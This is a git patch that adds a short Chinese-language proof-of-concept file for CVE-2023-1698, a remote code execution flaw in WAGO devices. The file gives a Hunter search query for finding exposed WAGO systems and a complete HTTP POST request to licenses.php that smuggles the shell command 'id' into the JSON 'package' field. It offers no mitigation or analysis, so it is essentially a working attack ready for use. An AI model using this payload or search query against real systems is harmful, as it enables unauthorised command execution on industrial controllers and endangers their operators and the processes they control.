From f771b94dc46a5d84c4a2d74cac852cb10f8352eb Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 18 Feb 2024 15:10:36 +0800
Subject: [PATCH] =?UTF-8?q?Create=20WAGO=E7=B3=BB=E7=BB=9F=E8=BF=9C?=
 =?UTF-8?q?=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?(CVE-2023-1698).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 WAGO系统远程代码执行漏洞(CVE-2023-1698).md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 WAGO系统远程代码执行漏洞(CVE-2023-1698).md

diff --git a/WAGO系统远程代码执行漏洞(CVE-2023-1698).md b/WAGO系统远程代码执行漏洞(CVE-2023-1698).md
new file mode 100644
index 0000000..1aaa853
--- /dev/null
+++ b/WAGO系统远程代码执行漏洞(CVE-2023-1698).md
@@ -0,0 +1,19 @@
+## WAGO系统远程代码执行漏洞(CVE-2023-1698)
+
+## 鹰图 hunter
+```
+web.similar_icon=="10798453453671307224"
+```
+## poc
+```
+POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1  
+Host: 127.0.0.0  
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36  
+Connection: close  
+Content-Length: 19  
+Content-Type: application/x-www-form-urlencoded  
+Accept-Encoding: gzip, deflate  
+  
+{"package":";id;#"}  
+```
+![image](https://github.com/wy876/POC/assets/139549762/4fc4fd00-bde1-4852-b6bc-b2c9a5a0256d)